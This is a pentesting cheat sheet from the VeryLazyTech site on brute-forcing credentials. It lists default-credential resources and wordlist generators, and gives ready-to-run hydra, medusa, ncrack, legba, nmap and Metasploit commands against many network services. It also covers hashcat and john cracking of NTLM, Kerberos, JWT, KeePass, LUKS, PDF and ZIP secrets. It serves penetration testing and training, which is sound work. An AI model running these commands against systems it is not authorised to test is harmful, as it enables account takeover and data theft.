# Brute Force - Services, web, local, tools & wordlists {% tabs %} {% tab title="Support VeryLazyTech 🎉" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚 {% endtab %} {% endtabs %} ## Default Credentials **Search in google** for default credentials of the technology that is being used, or **try these links**: One of the easiest and most overlooked attack vectors is the use of **default usernames and passwords**. Many systems, especially routers, cameras, IoT devices, web panels, and enterprise software, ship with default login credentials. These are often never changed — making them low-hanging fruit for attackers and red teamers alike. Before launching a brute-force attack, always check whether the system uses **default creds**. You can often find these in documentation, online forums, or public lists. ### **📚 Top Resources for Default Credentials:** * [DefaultCreds Cheat Sheet – GitHub](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [Phenoelit Default Password List](http://www.phenoelit.org/dpl/dpl.html) * [Vulnerability Assessment Default Passwords](http://www.vulnerabilityassessment.co.uk/passwordsC.htm) * [192.168.1.1 Default Router Password List](https://192-168-1-1ip.mobi/default-router-passwords-list/) * [DataRecovery Default Passwords](https://datarecovery.com/rd/default-passwords/) * [Bizuns Default Passwords List](https://bizuns.com/default-passwords-list) * [SecLists – Default Credentials CSV](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv) * [Dormidera Wordlist Compendium](https://github.com/Dormidera/WordList-Compendium) * [CIRT.net Password Search](https://www.cirt.net/passwords) * [PasswordsDatabase.com](http://www.passwordsdatabase.com/) * [Many Passwords Project](https://many-passwords.github.io/) * [The InfoCentric – Default Passwords](https://theinfocentric.com/) *** ## Create Your Own Dictionaries While default credential lists are a great starting point, **custom wordlists** tailored to your target dramatically increase the success rate of brute-force and dictionary attacks. By gathering intel about the target, you can generate personalized passwords that are far more likely to work. Here are some effective methods and tools for building your own dictionaries: ### **Crunch – Custom Pattern Generator** `crunch` allows you to generate wordlists with fine control over length, character sets, and patterns. ```bash # Length 4 to 6, using numbers and uppercase hex crunch 4 6 0123456789ABCDEF -o crunch1.txt # Length 4 only, using predefined charset crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Pattern-based example crunch 6 8 -t ,@@^^%% @ = lowercase | , = uppercase | % = numbers | ^ = special characters ``` *** ### **Website-Based Wordlists** Leverage content from target websites to generate relevant wordlists: ```bash # Use CeWL to scrape words from a target site cewl https://example.com -m 5 -w words.txt # Tok grabs words from a list of URLs cat urls.txt | tok # Extract words from JS files (via getjswords) cat js-urls.txt | python3 getjswords.py ``` *** ### [**CUPP**](https://github.com/Mebus/cupp) **(Common User Passwords Profiler)** Generate passwords based on personal info like name, birthdate, pets, etc. ```bash python3 cupp.py -h ``` ### **Wister – Wordlist Mutator** Create highly customized lists by combining keywords and patterns. ```bash python3 wister.py -w john james 1025 summer london 1999 -c 1 2 3 4 5 -o wordlist.lst __ _______ _____ _______ ______ _____ \ \ / /_ _|/ ____|__ __| ____| __ \ \ \ /\ / / | | | (___ | | | |__ | |__) | \ \/ \/ / | | \___ \ | | | __| | _ / \ /\ / _| |_ ____) | | | | |____| | \ \ \/ \/ |_____|_____/ |_| |______|_| \_\ Version 1.0.3 Cycurity Generating wordlist... [########################################] 100% Generated 54672 lines. Finished in 0.670s. ``` *** ### **Pydictor – Advanced Dictionary Generator** Powerful Python-based wordlist generator with smart rulesets.\ GitHub: [bluetiger9/pydictor](https://github.com/landgrey/pydictor)
*** **📚 Popular Wordlists & Repositories:** * [SecLists – Daniel Miessler](https://github.com/danielmiessler/SecLists) * [WordList-Compendium](https://github.com/Dormidera/WordList-Compendium) * [Kaonashi Passwords](https://github.com/kaonashi-passwords/Kaonashi) * [Google Fuzzing Dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries) * [CrackStation Wordlists](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [WeakPass](https://weakpass.com/wordlist/) * [Assetnote Wordlists](https://wordlists.assetnote.io/) * [Fuzzlists](https://github.com/fssecur3/fuzzlists) * [Hashkiller Lists](https://hashkiller.io/listmanager) * [Bug Bounty Wordlists – Karanxa](https://github.com/Karanxa/Bug-Bounty-Wordlists) *** ## Tools **Hash examples:** ### [Hash-identifier](https://www.kali.org/tools/hash-identifier/) ```bash hash-identifier > ``` ### Hashcat **Hashcat attacks** * **Wordlist attack** (`-a 0`) with rules **Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). ``` hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule ``` * **Wordlist combinator** attack It's possible to **combine 2 wordlists into 1** with hashcat.\ If list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated. ```bash # This will combine 2 wordlists hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt # Same attack as before but adding chars in the newly generated words # In the previous example this will generate: ## hello-world! ## hello-earth! hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $! ``` * **Mask attack** (`-a 3`) ```bash # Mask attack with simple mask hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d hashcat --help #will show the charsets and are as follows ? | Charset ===+========= l | abcdefghijklmnopqrstuvwxyz u | ABCDEFGHIJKLMNOPQRSTUVWXYZ d | 0123456789 h | 0123456789abcdef H | 0123456789ABCDEF s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ a | ?l?u?d?s b | 0x00 - 0xff # Mask attack declaring custom charset hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1 ## -1 ?d?s defines a custom charset (digits and specials). ## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset. # Mask attack with variable password length ## Create a file called masks.hcmask with this content: ?d?s,?u?l?l?l?l?1 ?d?s,?u?l?l?l?l?l?1 ?d?s,?u?l?l?l?l?l?l?1 ?d?s,?u?l?l?l?l?l?l?l?1 ?d?s,?u?l?l?l?l?l?l?l?l?1 ## Use it to crack the password hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask ``` * Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack ```bash # Mask numbers will be appended to each word in the wordlist hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d # Mask numbers will be prepended to each word in the wordlist hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt ``` ### **Hashcat modes** ```bash hashcat --example-hashes | grep -B1 -A2 "NTLM" ``` Cracking Linux Hashes - /etc/shadow file ``` 500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems ``` Cracking Windows Hashes ``` 3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems ``` Cracking Common Application Hashes ``` 900 | MD4 | Raw Hash 0 | MD5 | Raw Hash 5100 | Half MD5 | Raw Hash 100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash 1400 | SHA-256 | Raw Hash 1700 | SHA-512 | Raw Hash ``` *** ## Common Services Once you've got a solid wordlist, it's time to test it against live services. Below are examples for brute-forcing commonly exposed protocols using `Hydra`, `Nmap`, `Metasploit`, `Legba`, and more. ### [**AFP (Apple Filing Protocol)**](https://www.verylazytech.com/network-pentesting/apple-filing-protocol-afp-port-548) ```bash nmap -p 548 --script afp-brute ``` Using Metasploit: ``` msf> use auxiliary/scanner/afp/afp_login msf> set BLANK_PASSWORDS true msf> set USER_AS_PASS true msf> set PASS_FILE msf> set USER_FILE msf> run ``` *** ### [**AJP (Apache JServ Protocol)**](#ajp-apache-jserv-protocol) ```bash nmap --script ajp-brute -p 8009 ``` *** ### **AMQP (ActiveMQ, RabbitMQ, Qpid, etc.)** ```bash legba amqp --target localhost:5672 --username admin --password data/passwords.txt # Add --amql-ssl if needed for SSL connections ``` *** ### **Cassandra / ScyllaDB** ```bash nmap --script cassandra-brute -p 9160 # Using Legba legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042 ``` *** ### Cisco
*** ### **CouchDB** Metasploit: ``` msf> use auxiliary/scanner/couchdb/couchdb_login ``` Or using Hydra: ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get / ``` *** ### [**Docker Registry**](https://www.verylazytech.com/docker-port-2375-2376) ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt \ -P /usr/share/brutex/wordlists/password.lst \ 10.10.10.10 -s 5000 https-get /v2/ ``` *** ### **Elasticsearch** ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt \ -P /usr/share/brutex/wordlists/password.lst \ localhost -s 9200 http-get / ``` *** ### [**FTP (File Transfer Protocol)**](https://www.verylazytech.com/network-pentesting/ftp-port-21) **Hydra Example:** ```bash hydra -l root -P passwords.txt ftp ``` **Ncrack Example:** ```bash ncrack -p 21 --user root -P passwords.txt ``` **Medusa Example:** ```bash medusa -u root -P 500-worst-passwords.txt -h -M ftp ``` **Legba Example:** ```bash legba ftp --username admin --password wordlists/passwords.txt --target localhost:21 ``` *** ### HTTP Burte Force ### Login Form bruteforce **POST, Single list, filter string (hide)** ```bash wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php #Here we have filtered by line ``` **POST, 2 lists, filter code (show)** ```bash wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php #Here we have filtered by code ``` **GET, 2 lists, filter string (show), proxy, cookies** ```bash wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in" ``` ### Bruteforce Directory/RESTful bruteforce #### Arjun parameters wordlist ``` wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZ ``` #### Path Parameters BF ```bash wfuzz -c -w ~/git/Arjun/db/params.txt --hw 11 'http://example.com/path%3BFUZZ=FUZZ' ``` ### Header Authentication **Basic, 2 lists, filter string (show), proxy** ```bash wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --basic FUZZ:FUZ2Z "http://example.com/index.php" ``` **NTLM, 2 lists, filter string (show), proxy** ```bash wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --ntlm 'domain\FUZZ:FUZ2Z' "http://example.com/index.php" ``` ### Cookie/Header bruteforce (vhost brute) **Cookie, filter code (show), proxy** ```bash wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ" "http://example.com/index.php" ``` **User-Agent, filter code (hide), proxy** ```bash wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ" "http://example.com/index.php" ``` ### **Host** ```bash wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains- top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u http://example.com -t 100 ``` ### HTTP Verbs (methods) bruteforce #### **Using file** ```bash wfuzz -c -w methods.txt -p 127.0.0.1:8080:HTTP --sc 200 -X FUZZ "http://example.com/index.php" ``` #### **Using inline list** ```bash wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://testphp.vulnweb.com/ ``` #### Directory & Files Bruteforce ```bash #Filter by whitelisting codes wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,202,204,301,302,307,403 http://example.com/uploads/FUZZ ``` ### HTTP Basic Auth ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/ # Use https-get mode for https medusa -h -u -P -M http -m DIR:/path/to/auth -T 10 legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/ ``` ### HTTP - NTLM ```bash legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ ``` ### HTTP - Post Form ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V # Use https-post-form mode for https ``` For http**s** you have to change from "http-post-form" to "**https-post-form"** ### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle ```bash cmsmap -f W/J/D/M -u a -p a https://wordpress.com # Check also https://github.com/evilsocket/legba/wiki/HTTP ``` *** ### [IMAP](https://www.verylazytech.com/network-pentesting/imap-port-143-993) ```bash hydra -l USERNAME -P /path/to/passwords.txt -f imap -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V nmap -sV --script imap-brute -p legba imap --username user --password data/passwords.txt --target localhost:993 ``` *** ### [IRC](https://www.verylazytech.com/network-pentesting/irc-ports-194-6667-6660-7000) ```bash nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p ``` *** ### [ISCSI](https://www.verylazytech.com/iscsi-port-3260) ```bash nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 ``` *** ### [JWT (JSON Web Token)](https://www.verylazytech.com/pentesting-web/jwt-vulnerabilities) ``` git clone https://github.com/Sjord/jwtcrack.git cd jwtcrack #Bruteforce using crackjwt.py python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt #Bruteforce using john python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john john jwt.john #It does not work with Kali-John ``` ```bash # Hashcat hashcat -m 16500 -a 0 jwt.txt wordlists/rockyou.txt # CrackJWT python crackjwt.py /usr/share/wordlists/rockyou.txt # John the Ripper john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256 # JWT Tool python3 jwt_tool.py -d wordlists.txt # C-JWT-Cracker ./jwtcrack 1234567890 8 # JWT-Pwn python3 jwt-cracker.py -jwt -w wordlist.txt # JWT-Cracker (Node.js) jwt-cracker "" "abcdefghijklmnopqrstuwxyz" 6 ``` *** ### Keberoasting ```bash john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` *** ### Keepass ```bash sudo apt-get install -y kpcli #Install keepass tools like keepass2john keepass2john file.kdbx > hash #The keepass is only using password keepass2john -k file.kdbx > hash # The keepass is also using a file as a needed credential #The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` ### [LDAP](https://www.verylazytech.com/network-pentesting/ldap-ports-389-636-3268-3269) ```bash nmap --script ldap-brute -p 389 legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match ``` *** ### Lucks image ```bash bruteforce-luks -f ./list.txt ./backup.img cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` ```bash cryptsetup luksDump backup.img #Check that the payload offset is set to 4096 dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1 hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` Another Luks BF tutorial: *** ### [MQTT](https://www.verylazytech.com/mqtt-message-queuing-telemetry-transport-port-1883) ```bash ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt ``` *** ### [MongoDB](#mongodb) ```bash nmap -sV --script mongodb-brute -n -p 27017 # Metasploit msf> use auxiliary/scanner/mongodb/mongodb_login # Legba legba mongodb --target localhost:27017 --username root --password data/passwords.txt ``` *** ### [MSSQL](https://www.verylazytech.com/network-pentesting/mssql-microsoft-sql-server-port-1433) ```bash # MSSQLPwner - Bruteforce using tickets, hashes, and/or passwords mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt # Legba legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433 ``` *** ### [MySQL](https://www.verylazytech.com/network-pentesting/mssql-microsoft-sql-server-port-1433) 
# Hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# Metasploit
msf> use auxiliary/scanner/mysql/mysql_login
msf> set VERBOSE false

# Medusa
medusa -h <IP/Host> -u <username> -P <password_list> -f -t <threads> -M mysql

# Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
*** ### NTLM cracking ```bash Format:USUARIO:ID:HASH_LM:HASH_NT::: john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot ``` *** ### Open Office Pwd Protected Column If you have an xlsx file with a column protected by a password you can unprotect it: * **Upload it to google drive** and the password will be automatically removed * To **remove** it **manually**: ```bash unzip file.xlsx grep -R "sheetProtection" ./* # Find something like: # Remove that line and rezip the file zip -r file.xls . ``` *** ### [OracleSQL](https://www.verylazytech.com/network-pentesting/oracle-tns-listener-port-1521-1522-1529) ```bash patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 ./odat.py passwordguesser -s $SERVER -d $SID ./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt #msf1 msf> use admin/oracle/oracle_login msf> set RHOSTS msf> set RPORT 1521 msf> set SID #msf2, this option uses nmap and it fails sometimes for some reason msf> use scanner/oracle/oracle_login msf> set RHOSTS msf> set RPORTS 1521 msf> set SID #for some reason nmap fails sometimes when executing this script nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt ``` In order to use **oracle\_login** with **patator** you need to **install**: ```bash pip3 install cx_Oracle --upgrade ``` [Offline OracleSQL hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**): ```bash nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 ``` *** ### PDF ```bash apt-get install pdfcrack pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt #pdf2john didn't work well, john didn't know which hash type was # To permanently decrypt the pdf sudo apt-get install qpdf qpdf --password= --decrypt encrypted.pdf plaintext.pdf ``` ### PDF Owner Password To crack a PDF Owner password check this: *** ### PGP/GPG Private key ```bash gpg2john private_pgp.key #This will generate the hash and save it in a file john --wordlist=/usr/share/wordlists/rockyou.txt ./hash ``` *** ### [POP](https://www.verylazytech.com/network-pentesting/pop-port-110-995) ```bash hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V # Insecure legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110 # SSL legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl ``` *** ### PostgreSQL 
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
*** ### PFX Certificates ```bash # From https://github.com/Ridter/p12tool ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt # From https://github.com/crackpkcs12/crackpkcs12 crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` *** ### [PPTP](https://www.verylazytech.com/pptp-port-1723) You can download the `.deb` package to install from ```bash sudo dpkg -i thc-pptp-bruter*.deb #Install the package cat rockyou.txt | thc-pptp-bruter –u ``` *** ### RDP ```bash ncrack -vv --user -P pwds.txt rdp:// hydra -V -f -L -P rdp:// legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon] ``` *** ### Redis ```bash msf> use auxiliary/scanner/redis/redis_login nmap --script redis-brute -p 6379 hydra –P /path/pass.txt redis://: # 6379 is the default legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl] ``` *** ### [Rexec](https://www.verylazytech.com/network-pentesting/rexec-port-512) ```bash hydra -l -P rexec:// -v -V ``` *** ### [Rlogin](https://www.verylazytech.com/network-pentesting/rlogin-port-513) ```bash hydra -l -P rlogin:// -v -V ``` *** ### [Rsh](https://www.verylazytech.com/network-pentesting/rsh-port-514) ```bash hydra -L rsh:// -v -V ``` {% embed url="" %} *** ### [Rsync](https://www.verylazytech.com/network-pentesting/rsync-port-873) ```bash nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 ``` *** ### [RTSP](https://www.verylazytech.com/network-pentesting/rtsp-port-554-8554) ```bash hydra -l root -P passwords.txt rtsp ``` *** ### SFTP ```bash legba sftp --username admin --password wordlists/passwords.txt --target localhost:22 # Try keys from a folder legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` *** ### [SNMP](https://www.verylazytech.com/network-pentesting/snmp-ports-161-162-10161-and-10162-udp) ```bash msf> use auxiliary/scanner/snmp/snmp_login nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ] onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp ``` *** ### [SMB](https://www.verylazytech.com/network-pentesting/smb-port-139-445) ```bash nmap --script smb-brute -p 445 hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup ] [--smb-share ] ``` *** ### [SMTP](https://www.verylazytech.com/network-pentesting/smtp-s-port-25-465-587) ```bash hydra -l -P /path/to/passwords.txt smtp -V hydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism ] ``` *** ### [SOCKS](https://www.verylazytech.com/network-pentesting/socks-port-1080) ```bash nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 legba socks5 --target localhost:1080 --username admin --password data/passwords.txt # With alternative address legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080 ``` *** ### SQL Server ```bash #Use the NetBIOS name of the machine as domain crackmapexec mssql -d -u usernames.txt -p passwords.txt hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt mssql medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT ``` *** ### [SSH](https://www.verylazytech.com/network-pentesting/ssh-port-22) ```bash hydra -l root -P passwords.txt [-t 32] ssh ncrack -p 22 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M ssh patator ssh_login host= port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed' legba ssh --username admin --password wordlists/passwords.txt --target localhost:22 # Try keys from a folder legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` ### **Weak SSH keys / Debian predictable PRNG** Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Pre-generated sets of weak keys are also available such as [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). *** ### STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ) The STOMP text protocol is a widely used messaging protocol that **allows seamless communication and interaction with popular message queueing services** such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations. ```bash legba stomp --target localhost:61613 --username admin --password data/passwords.txt ``` *** ### [Telnet](https://www.verylazytech.com/network-pentesting/telnet-port-23) ```bash hydra -l root -P passwords.txt [-t 32] telnet ncrack -p 23 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M telnet legba telnet \ --username admin \ --password wordlists/passwords.txt \ --target localhost:23 \ --telnet-user-prompt "login: " \ --telnet-pass-prompt "Password: " \ --telnet-prompt ":~$ " \ --single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin ``` *** ### VNC ```bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc medusa -h –u root -P /root/Desktop/pass.txt –M vnc ncrack -V --user root -P /root/Desktop/pass.txt :>POR>T patator vnc_login host= password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0 use auxiliary/scanner/vnc/vnc_login nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt legba vnc --target localhost:5901 --password data/passwords.txt #Metasploit use auxiliary/scanner/vnc/vnc_login set RHOSTS set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst ``` *** ### Winrm ```bash crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` *** ### ZIP ```bash #sudo apt-get install fcrackzip fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip ``` ```bash zip2john file.zip > zip.john john zip.john ``` ```bash #$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$ hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack ``` #### **Known plaintext zip attack** You need to know the **plaintext** (or part of the plaintext) **of a file contained inside** the encrypted zip. You can check **filenames and size of files contained inside** an encrypted zip running: **`7z l encrypted.zip`**\ Download [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)from the releases page. ```bash # You need to create a zip file containing only the file that is inside the encrypted zip zip plaintext.zip plaintext.file ./bkcrack -C -c -P -p # Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18 # With that key you can create a new zip file with the content of encrypted.zip # but with a different pass that you set (so you can decrypt it) ./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd unzip unlocked.zip #User new_pwd as password ``` ### 7z ```bash 